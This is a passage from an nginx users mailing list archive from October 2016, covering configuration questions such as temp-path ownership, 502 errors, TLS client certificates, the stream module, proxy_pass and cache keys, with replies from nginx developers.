Aubry wrote: [...] > I do have several nginx inscances on one Server, they all run as a > different users. > > There is one main nginx instance which runs as the user www-data. > > *_temp_path is set to a different location for all nginx instances > excluding the main instance. The main www-data instance is still > using /var/lib/nginx. > > Configuration example for custom temp dirs: > ================================================================ > fastcgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/fcgi; > scgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/scgi; > uwsgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/wsgi; > client_body_temp_path /var/www/vhosts/XYZ/tmp/nginx/body; > proxy_temp_path /var/www/vhosts/XYZ/tmp/nginx/proxy; > ================================================================ > > Now, let's restart the main nginx. You can see that all > files/directories in /var/lib/nginx are owned by www-data:www-data: > ================================================================ > root at xxxx-web-03:/var/log/nginx# systemctl restart nginx.service > root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx > total 28 > drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . > drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. > drwx------ 2 www-data www-data 4096 Oct 25 15:03 body > drwx------ 2 www-data www-data 4096 Oct 6 14:43 fastcgi > drwx------ 9 www-data www-data 4096 Oct 25 10:18 proxy > drwx------ 2 www-data www-data 4096 Oct 6 14:43 scgi > drwx------ 2 www-data www-data 4096 Oct 6 14:43 uwsgi > ================================================================ > > After restarting nginx-XYZ.service, all files/directories are owned by XYZ: > ================================================================ > root at xxxx-web-03:/var/log/nginx# systemctl restart nginx-XYZ.service > root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx > total 28 > drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . > drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. > drwx------ 2 XYZ www-data 4096 Oct 25 15:03 body > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 fastcgi > drwx------ 9 XYZ www-data 4096 Oct 25 10:18 proxy > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 scgi > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 uwsgi > root at xxxx-web-03:/var/log/nginx# > ================================================================ > > I can't find the string /var/lib/nginx in any nginx Configuration file on the system: > ================================================================ > root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx-XYZ/ > root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx/ > root at xxxx-web-03:/var/log/nginx# > ================================================================ > > I can set all *_temp_path directories of the www-data nginx to an other direcory, > this is my current workaround for this issue. But i believe that the nginx shouldn't > touch /var/lib/ngin/* if this directory isn't in the configuration file. > > Any idea? Should i open a bug? Make sure to define temp paths in all servers, or, better yet, at http{} level. If you don't redefine them in some context, nginx will use the default paths compiled in, resulting in the behaviour you've observed. That is, something like this will work correctly, without touching compiled-in client_body_temp: http { server { listen 8080; client_body_temp_path /path/to/client_body_temp; } } But the configuration below will use both configured and compiled-in client_body_temp: http { server { listen 8080; client_body_temp_path /path/to/client_body_temp; } server { listen 8081; } } As previously suggested, best solution is to set relevant directives at http{} level: http { client_body_temp_path /path/to/client_body_temp; server { listen 8080; } server { listen 8081; } } -- Maxim Dounin http://nginx.org/ From 906717 at qq.com Tue Oct 25 15:24:27 2016 From: 906717 at qq.com (=?ISO-8859-1?B?QW5zd2Vy?=) Date: Tue, 25 Oct 2016 23:24:27 +0800 Subject: nginx 502 Message-ID: log_format access '$remote_addr - $remote_user [$time_local] "$request" $http_host $status $body_bytes_sent "$http_referer" "$http_x_forwarded_for" "$upstream_addr" "$upstream_status" $upstream_cache_status "$upstream_http_content_type" "$upstream_response_time" > $request_time "$http_user_agent" '; 180.106.101.115 - - [25/Oct/2016:22:53:52 +0800] "GET /Code?callback=a&userName=aa05ee5b9fdb HTTP/1.1" ab.com 502 67 "https://ab.com/login/ulogin.php?callback=loginCallback" "-" "192.168.0.116:443" "200" - "text/json; charset=UTF-8" "0.044" > 0.044 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.1322.400 QQBrowser/9.4.9211.400" Why is upstream_status returned to the 200 state, while status returns is 502? Does it mean that the backend server is returned to normal, and nginx returns to the client is 502 bad gateway? Which aspect should proceed to look into the problem? -------------- next part -------------- An HTML attachment was scrubbed... URL: From jeremy.bjs2 at gmail.com Tue Oct 25 16:30:38 2016 From: jeremy.bjs2 at gmail.com (Jeremy Gates) Date: Tue, 25 Oct 2016 16:30:38 +0000 Subject: Does http pipeline prevent nginx from graceful shutdown active connections? Message-ID: Hi, all I found a recent code commit of Nginx fixed one issue that prevent nginx from graceful shutdown active connections for HTTP/2: http://hg.nginx.org/nginx/rev/5e95b9fb33b7 Just for curiosity, I was wondering if this is a problem for pipelined HTTP requests. Thanks, Jeremy -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Oct 25 16:40:30 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 25 Oct 2016 19:40:30 +0300 Subject: Does http pipeline prevent nginx from graceful shutdown active connections? In-Reply-To: References: Message-ID: <3447244.r8ebcLiEtL@vbart-workstation> On Tuesday 25 October 2016 16:30:38 Jeremy Gates wrote: > Hi, all > > I found a recent code commit of Nginx fixed one issue that prevent nginx > from graceful shutdown active connections for HTTP/2: > > http://hg.nginx.org/nginx/rev/5e95b9fb33b7 > > Just for curiosity, I was wondering if this is a problem for pipelined HTTP > requests. No, there's no such problem with pipelined requests. Pipelined requests are processed sequentially one by one, nginx quits before starting processing the next request. wbr, Valentin V. Bartenev From nginx-forum at forum.nginx.org Tue Oct 25 23:20:00 2016 From: nginx-forum at forum.nginx.org (WGH) Date: Tue, 25 Oct 2016 19:20:00 -0400 Subject: Encrypting TLS client certificates` Message-ID: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> When nginx requests a client certificate with ssl_verify_client option, and client complies, the latter sends its certificate in plain text. Although it's just a public part of the certificate, one can consider it a kind of information disclosure, since user name, email, organization, etc. is transmitted in plain text. According to this stackexchange question - https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates - it's technically possible to request client certificate after connection is encrypted. Is it possible to do that in nginx? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270558,270558#msg-270558 From gfrankliu at gmail.com Tue Oct 25 23:28:22 2016 From: gfrankliu at gmail.com (Frank Liu) Date: Tue, 25 Oct 2016 16:28:22 -0700 Subject: round robin rule Message-ID: If I configure one "upstream" with 2 servers and use the default round robin, will the traffic be balanced based on the upstream or the virtual servers. e.g.: if I configure 2 virtual host "server" blocks, both proxy_pass the same upstream, will the requests to each virtual host be balanced individually? Assuming a test case where odd requests go to VH1 and even requests go to VH2, will VH1's traffic all be balanced upstream server1 and VH2's traffic all be balanced to upstream server2? Or will both VH1 and VH2 have 50%/50% on server1/server2? -------------- next part -------------- An HTML attachment was scrubbed... URL: From rainer at ultra-secure.de Wed Oct 26 00:11:30 2016 From: rainer at ultra-secure.de (Rainer Duffner) Date: Wed, 26 Oct 2016 02:11:30 +0200 Subject: Encrypting TLS client certificates` In-Reply-To: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> References: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> Message-ID: <82D7FC05-FC2C-4446-BC65-6D8D556FCB7F@ultra-secure.de> > Am 26.10.2016 um 01:20 schrieb WGH : > > When nginx requests a client certificate with ssl_verify_client option, > and client complies, the latter sends its certificate in plain text. > > Although it's just a public part of the certificate, one can consider it > a kind of information disclosure, since user name, email, organization, > etc. is transmitted in plain text. > > According to this stackexchange question - > https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates > - it's technically possible to request client certificate after > connection is encrypted. > > Is it possible to do that in nginx? > Interesting. Is that also the case if you?ve got HSTS enabled? We have clients sending around ssl private keys by email (I wouldn?t be surprised if ?somebody? was harvesting those off the internet - but people usually don?t care?) - so your case is very much a luxury-problem for me. From obri at chaostreff.ch Wed Oct 26 08:47:20 2016 From: obri at chaostreff.ch (Daniel Aubry) Date: Wed, 26 Oct 2016 10:47:20 +0200 Subject: Bug? Chown of all default *_temp_path directories at startup? In-Reply-To: <20161025151009.GW73038@mdounin.ru> References: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> <20161025151009.GW73038@mdounin.ru> Message-ID: <20161026104720.3729b887@wssyg666.sygroup-int.ch> On Tue, 25 Oct 2016 18:10:09 +0300 Maxim Dounin wrote: Hi Maxim > Make sure to define temp paths in all servers, or, better yet, at > http{} level. If you don't redefine them in some context, nginx > will use the default paths compiled in, resulting in the behaviour > you've observed. Many thanks for your answer, i had the setting at the server level, i've moved it to the http level, and it works now. Best Regards Daniel From nginx-forum at forum.nginx.org Wed Oct 26 13:28:59 2016 From: nginx-forum at forum.nginx.org (Michiel) Date: Wed, 26 Oct 2016 09:28:59 -0400 Subject: Upstream server error Message-ID: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> Hi I'm having issues with Google Endpoints and NGINX. I keep on getting the following error message: 2016/10/26 13:02:09 [error] 15802#0: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 78.20.209.87, server: , request: "GET /v1 HTTP/1.1", upstream: "http://127.0.0.1:8081/v1", host: "104.199.29.197" It seems like NGINX isn't listening to port 8081? Here's my configuration file (currently set up for testing): user nginx; worker_processes 1; worker_rlimit_nofile 65535; pid /run/nginx.pid; error_log /var/log/nginx/error.log notice; events { worker_connections 65535; } http { access_log /dev/null; rewrite_log on; sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; server_tokens off; include /etc/nginx/mime.types; default_type application/octet-stream; limit_req_zone $binary_remote_addr zone=perip:10m rate=50r/s; limit_conn_zone $binary_remote_addr zone=peraddr:10m; server { listen 8081; server_name _; root /usr/share/nginx/api.puls.be; location / { return 200 '{status: "ok"}'; add_header application/json; } error_page 403 404 500 502 503 504 /404.html; location = /404.html { root error; } } } Any idea's on how to catch requests to the upstream server? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270568,270568#msg-270568 From mdounin at mdounin.ru Wed Oct 26 15:08:00 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 26 Oct 2016 18:08:00 +0300 Subject: Encrypting TLS client certificates` In-Reply-To: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> References: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161026150800.GE73038@mdounin.ru> Hello! On Tue, Oct 25, 2016 at 07:20:00PM -0400, WGH wrote: > When nginx requests a client certificate with ssl_verify_client option, > and client complies, the latter sends its certificate in plain text. > > Although it's just a public part of the certificate, one can consider it > a kind of information disclosure, since user name, email, organization, > etc. is transmitted in plain text. > > According to this stackexchange question - > https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates > - it's technically possible to request client certificate after > connection is encrypted. > > Is it possible to do that in nginx? No. This process requires renegotiation, and renegotiation is explicitly rejected by nginx due to security implications it has. -- Maxim Dounin http://nginx.org/ From vbart at nginx.com Wed Oct 26 16:43:13 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 26 Oct 2016 19:43:13 +0300 Subject: Upstream server error In-Reply-To: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> References: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> Message-ID: <3589533.AHdlFFWJRM@vbart-workstation> On Wednesday 26 October 2016 09:28:59 Michiel wrote: > Hi > > I'm having issues with Google Endpoints and NGINX. > I keep on getting the following error message: > > 2016/10/26 13:02:09 [error] 15802#0: *1 connect() failed (111: Connection > refused) while connecting to upstream, client: 78.20.209.87, server: , > request: "GET /v1 HTTP/1.1", upstream: "http://127.0.0.1:8081/v1", host: > "104.199.29.197" > > It seems like NGINX isn't listening to port 8081? > > Here's my configuration file (currently set up for testing): > > user nginx; > > worker_processes 1; > worker_rlimit_nofile 65535; > > pid /run/nginx.pid; > > error_log /var/log/nginx/error.log notice; > > events { > worker_connections 65535; > } > > http { > > access_log /dev/null; > rewrite_log on; > > sendfile on; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 65; > types_hash_max_size 2048; > server_tokens off; > > include /etc/nginx/mime.types; > default_type application/octet-stream; > > limit_req_zone $binary_remote_addr zone=perip:10m rate=50r/s; > limit_conn_zone $binary_remote_addr zone=peraddr:10m; > > server { > > listen 8081; > server_name _; > root /usr/share/nginx/api.puls.be; > > location / { > return 200 '{status: "ok"}'; > add_header application/json; It should be: default_type application/json; > } > > error_page 403 404 500 502 503 504 /404.html; > location = /404.html { > root error; > } > > } > > } > > Any idea's on how to catch requests to the upstream server? > [..] The configuration above doesn't look like a valid one due to invalid "add_header" directive. Your nginx cannot load it. wbr, Valentin V. Bartenev From nginx-forum at forum.nginx.org Thu Oct 27 14:15:57 2016 From: nginx-forum at forum.nginx.org (etiennej) Date: Thu, 27 Oct 2016 10:15:57 -0400 Subject: Problem nginx perf Message-ID: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> Hello ! I've got some strange behaviour testing nginx with gatling. My scenario is : 50 users over 1 second try to access one very simple html page (only "test" in it). nginx conf for conf.d/test.conf : server { listen 80; location /test { alias /var/www; index index.html;} } I find my results strange because access time go from 4ms to 366ms ! My configuration is pretty simple but it shouldn't be a problem for nginx to handle connections on such a simple request on 50 concurrent users ? I added these lines to the standard conf. In nginx.conf : keepalive_timeout 65; keepalive_requests 100000; sendfile on; tcp_nopush on; tcp_nodelay on; Number of workers is on auto. Is there something big i'm missing ? My server is 4 proc and 2 Go Ram. Needless to say this simple test doesn't overflow the ressources. Regards, Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270597,270597#msg-270597 From dragon_nat at hotmail.com Thu Oct 27 15:53:15 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Thu, 27 Oct 2016 15:53:15 +0000 Subject: Receive raw data In-Reply-To: References: , Message-ID: Can I use http and stream in nginx.conf like this? http { ....... } ________________________________ From: nginx on behalf of Richard Stanway Sent: Monday, October 24, 2016 10:25 PM To: nginx at nginx.org Subject: Re: Receive raw data Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead. https://nginx.org/en/docs/stream/ngx_stream_core_module.html Module ngx_stream_core_module - nginx.org nginx.org Sets the address and port for the socket on which the server will accept connections. It is possible to specify just the port. The address can also be a hostname, for ... On Mon, Oct 24, 2016 at 2:56 PM, Nattakorn S > wrote: Dear all I have electronic device and I config to send TCP/IP data to my server by raw data no http header. My server use nginx with fastcgi for webserver and develop my application for get message from port 8080. But nginx always response with error 400 with "client sent invalid method while reading client request line". I know cause my electronic device not have correct header in packet. So I try add "ignore_invalid_headers off;" in http scope but not work. I need to bypass raw data to my application. Thank you. _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From dragon_nat at hotmail.com Thu Oct 27 15:54:49 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Thu, 27 Oct 2016 15:54:49 +0000 Subject: Receive raw data In-Reply-To: References: , Message-ID: Can I use http and stream like this http { ...................... } stream { ...................... } in same nginx.conf Thank you ________________________________ From: nginx on behalf of Richard Stanway Sent: Monday, October 24, 2016 10:25 PM To: nginx at nginx.org Subject: Re: Receive raw data Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead. https://nginx.org/en/docs/stream/ngx_stream_core_module.html Module ngx_stream_core_module - nginx.org nginx.org Sets the address and port for the socket on which the server will accept connections. It is possible to specify just the port. The address can also be a hostname, for ... On Mon, Oct 24, 2016 at 2:56 PM, Nattakorn S > wrote: Dear all I have electronic device and I config to send TCP/IP data to my server by raw data no http header. My server use nginx with fastcgi for webserver and develop my application for get message from port 8080. But nginx always response with error 400 with "client sent invalid method while reading client request line". I know cause my electronic device not have correct header in packet. So I try add "ignore_invalid_headers off;" in http scope but not work. I need to bypass raw data to my application. Thank you. _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Thu Oct 27 18:41:34 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Thu, 27 Oct 2016 14:41:34 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? Message-ID: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org> Hi! I was wondering if anyone has an idea to serve pre-compressed (gzip) HTML using proxy_cache / fastcgi_cache. I tried a solution with a map of http_accept_encoding as part of the fastcgi_cache_key with gzip compressed output from the script, but it resulted into strange behavior (the MD5 hash for the first request corresponds to the KEY, the next requests with an unknown MD5 hash using the same KEY. Nginx version: 1.11.1 The initial solution to serve pre-compressed gzip HTML from proxy_cache / fastcgi_cache was the following: Map: map $http_accept_encoding $gzip_enabled { ~*gzip gzip; } Server: fastcgi_cache_path /path/to/cache/nginx levels=1:2 keys_zone=XXX:20m max_size=4g inactive=7d; PHP-FPM proxy: set $cache_key "$gzip_enabled$request_method$request_uri"; fastcgi_pass unix:/path/to/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PHP_VALUE "error_log=/path/to/logs/php.error.log"; fastcgi_intercept_errors on; # full page cache fastcgi_no_cache $skip_cache_save; fastcgi_cache_bypass $skip_cache; fastcgi_cache XXX; fastcgi_cache_use_stale error timeout invalid_header updating http_500; fastcgi_ignore_headers Cache-Control Expires Set-Cookie; fastcgi_cache_valid 200 7d; # valid for 7 days fastcgi_cache_valid 301 302 304 1h; fastcgi_cache_valid any 5m; fastcgi_cache_lock on; fastcgi_cache_lock_timeout 5s; fastcgi_cache_key $cache_key; add_header X-Cache $upstream_cache_status; #add_header X-Cache-Key $cache_key; include fastcgi_params; It did work when testing in 1 browser: it showed "MISS" and "HIT" for 2 requests. The cache directory showed the correct MD5 hash for the key. But when testing the same URL again in a different browser, a yet unexplained behavior occurred. A totally new MD5 hash was used to store the same pre-compressed content. When viewing the cached file, the exact same KEY was shown (without additional spaces or special characters). Although the solution with a GZIP parameter may work, I was wondering if anyone knows of a better solution to serve pre-compressed HTML from Nginx cache as it results into 4 to 10ms latency saving per request on a idle quad-core server with 4x SSD in RAID 10. I could not find any information related to a solution in Google while it appears to be a major potential for performance gain on high traffic websites. Best Regards, Jan Jaap Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270604#msg-270604 From eric.cox at kroger.com Thu Oct 27 19:44:56 2016 From: eric.cox at kroger.com (Cox, Eric S) Date: Thu, 27 Oct 2016 19:44:56 +0000 Subject: Dynamically Reload Map Message-ID: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com> Is anyone aware of a way to dynamically reload a file when using the MAP module without having to reload the server? We have a file that gets updated roughly every minute that needs reloaded and it seem that doing a reload every minute on the server processes might cause a performance issue? Also is anywhere aware of a way to view the current size for the map hash tables? Thanks ________________________________ This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain information that is confidential and protected by law from unauthorized disclosure. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Thu Oct 27 23:19:23 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 10:19:23 +1100 Subject: nginx and FIX server Message-ID: Hi any one setup nginx infront of a fix engine to do rate limiting ? Alex From zxcvbn4038 at gmail.com Fri Oct 28 00:57:02 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Thu, 27 Oct 2016 20:57:02 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID: FIX as in the financial information exchange protocol? On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad wrote: > Hi > > any one setup nginx infront of a fix engine to do rate limiting ? > > Alex > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Fri Oct 28 03:22:39 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 14:22:39 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID: Yep On 28 October 2016 at 11:57, CJ Ess wrote: > FIX as in the financial information exchange protocol? > > On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad wrote: >> >> Hi >> >> any one setup nginx infront of a fix engine to do rate limiting ? >> >> Alex >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From zxcvbn4038 at gmail.com Fri Oct 28 05:15:19 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Fri, 28 Oct 2016 01:15:19 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID: Maybe this is what you want: https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html See the parts about proxy_download_rate and proxy_upload_rate On Thu, Oct 27, 2016 at 11:22 PM, Alex Samad wrote: > Yep > > On 28 October 2016 at 11:57, CJ Ess wrote: > > FIX as in the financial information exchange protocol? > > > > On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad wrote: > >> > >> Hi > >> > >> any one setup nginx infront of a fix engine to do rate limiting ? > >> > >> Alex > >> > >> _______________________________________________ > >> nginx mailing list > >> nginx at nginx.org > >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Fri Oct 28 05:29:41 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 16:29:41 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID: Hi yeah I have had a very quick look, just wondering if any one on the list had set one up. Alex On 28 October 2016 at 16:15, CJ Ess wrote: > Maybe this is what you want: > https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html > > See the parts about proxy_download_rate and proxy_upload_rate > > On Thu, Oct 27, 2016 at 11:22 PM, Alex Samad wrote: >> >> Yep >> >> On 28 October 2016 at 11:57, CJ Ess wrote: >> > FIX as in the financial information exchange protocol? >> > >> > On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad wrote: >> >> >> >> Hi >> >> >> >> any one setup nginx infront of a fix engine to do rate limiting ? >> >> >> >> Alex >> >> >> >> _______________________________________________ >> >> nginx mailing list >> >> nginx at nginx.org >> >> http://mailman.nginx.org/mailman/listinfo/nginx >> > >> > >> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Fri Oct 28 10:11:47 2016 From: nginx-forum at forum.nginx.org (etiennej) Date: Fri, 28 Oct 2016 06:11:47 -0400 Subject: Problem nginx perf In-Reply-To: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> References: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <04bed1bdc73dc41a393dabdcf5fe1843.NginxMailingListEnglish@forum.nginx.org> I noticed, the first or 2 first requests are always the slower, and then comes the normal -fast- behavior. Anything I should now about that ? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270597,270618#msg-270618 From dragon_nat at hotmail.com Fri Oct 28 11:16:03 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Fri, 28 Oct 2016 11:16:03 +0000 Subject: Nginx with ngx_stream_core_module Message-ID: Dear all I have electronic device and I config to send TCP/IP data to my server by raw data no http header. My server use nginx with and config for use module ngx_stream_core_module like this stream { server { listen 127.0.0.1:8080; proxy_pass 127.0.0.1:9090; proxy_buffer_size 16k; } } I run fastcgi server at port 9090. How I config nginx for sent transaction from 8080 to fastcgi server at 9090 Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Fri Oct 28 11:31:06 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 28 Oct 2016 14:31:06 +0300 Subject: Nginx with ngx_stream_core_module In-Reply-To: References: Message-ID: <20161028113106.GV73038@mdounin.ru> Hello! On Fri, Oct 28, 2016 at 11:16:03AM +0000, Nattakorn S wrote: > I have electronic device and I config to send TCP/IP data to my > server by raw data no http header. > > My server use nginx with and config for use module > ngx_stream_core_module like this > > > stream { > server { > listen 127.0.0.1:8080; > proxy_pass 127.0.0.1:9090; > proxy_buffer_size 16k; > } > } > > I run fastcgi server at port 9090. How I config nginx for sent > transaction from 8080 to fastcgi server at 9090 The stream module is to route raw TCP/IP streams, while what you want to do requires converting a raw stream into a FastCGI request. This is not something you can do using the stream module. -- Maxim Dounin http://nginx.org/ From dragon_nat at hotmail.com Fri Oct 28 12:47:53 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Fri, 28 Oct 2016 12:47:53 +0000 Subject: =?UTF-8?B?4LiV4Lit4Lia4LiB4Lil4Lix4LiaOiBSZTogTmdpbnggd2l0aCBuZ3hfc3RyZWFt?= =?UTF-8?B?X2NvcmVfbW9kdWxl?= Message-ID: Thank you Maxim I try to use stream module because http module not work with raw incoming TCP/IP. I always got error 400 and transaction not sent from nginx to my app so I try to use stream module. My app develop with fcgi So if you mean my app can not accept raw TCP/IP data I'll try to change my app. Please suggest me how to develop c++ app for receive stream without fastcgi. Thank you ??????? Samsung ?Mobile -------- ?????????????????? -------- ???: Maxim Dounin ???????: 28/10/2016 18:31 (GMT+07:00) ???: nginx at nginx.org ??????: Re: Nginx with ngx_stream_core_module Hello! On Fri, Oct 28, 2016 at 11:16:03AM +0000, Nattakorn S wrote: > I have electronic device and I config to send TCP/IP data to my > server by raw data no http header. > > My server use nginx with and config for use module > ngx_stream_core_module like this > > > stream { > server { > listen 127.0.0.1:8080; > proxy_pass 127.0.0.1:9090; > proxy_buffer_size 16k; > } > } > > I run fastcgi server at port 9090. How I config nginx for sent > transaction from 8080 to fastcgi server at 9090 The stream module is to route raw TCP/IP streams, while what you want to do requires converting a raw stream into a FastCGI request. This is not something you can do using the stream module. -- Maxim Dounin http://nginx.org/ _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Fri Oct 28 13:12:31 2016 From: nginx-forum at forum.nginx.org (stuwat) Date: Fri, 28 Oct 2016 09:12:31 -0400 Subject: Nginx proxy_pass not working as expected. Message-ID: Hi I have the virtualhost file configured as the following:- server { server_name example.com; location / { proxy_pass http://example.org; } } When I visit example.com it redirects correctly to example.org, but I need it to show example.com in the address bar. How can I do this? i tried changing it to location / { proxy_pass http://example.org; proxy_set_header Host example.com; } } but it still shows example.org in the address bar, what do I need to do? Thanks Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270626,270626#msg-270626 From jeff.dyke at gmail.com Fri Oct 28 14:02:19 2016 From: jeff.dyke at gmail.com (Jeff Dyke) Date: Fri, 28 Oct 2016 10:02:19 -0400 Subject: Nginx proxy_pass not working as expected. In-Reply-To: References: Message-ID: You may want to define example.org as an upstream if it is just an application server that handles requests, but not entirely sure what you're trying to accomplish... upstream anything.you.want { server 127.0.0.1:PORT # or domain name; } server { server_name example.com; location / { proxy_pass http://a nything.you.want; } } HTH Jeff On Fri, Oct 28, 2016 at 9:12 AM, stuwat wrote: > Hi > > I have the virtualhost file configured as the following:- > > server { > server_name example.com; > > location / { > proxy_pass http://example.org; > } > } > > > When I visit example.com it redirects correctly to example.org, but I need > it to show example.com in the address bar. How can I do this? > > i tried changing it to > > location / { > proxy_pass http://example.org; > proxy_set_header Host example.com; > } > } > > but it still shows example.org in the address bar, what do I need to do? > > Thanks > > Posted at Nginx Forum: https://forum.nginx.org/read. > php?2,270626,270626#msg-270626 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Fri Oct 28 14:17:11 2016 From: nginx-forum at forum.nginx.org (stuwat) Date: Fri, 28 Oct 2016 10:17:11 -0400 Subject: Nginx proxy_pass not working as expected. In-Reply-To: References: Message-ID: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org> We're trying to point example.com at a site hosted at github... So we need example.com to point to the site hosted at example.github.io So a user visits example.com they get the page hosted at example.github.com, but with example.com still in the address bar. HTH Stuart Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270626,270629#msg-270629 From zxcvbn4038 at gmail.com Fri Oct 28 15:48:29 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Fri, 28 Oct 2016 11:48:29 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID: Cool. Probably off topic, but why rate limit FIX? My solution for heavy traders was always to put them on their own hardware and pass the costs back to them. They are usually invested in whatever strategy they are using and happy to pay up. On Fri, Oct 28, 2016 at 1:29 AM, Alex Samad wrote: > Hi > > yeah I have had a very quick look, just wondering if any one on the > list had set one up. > > Alex > > On 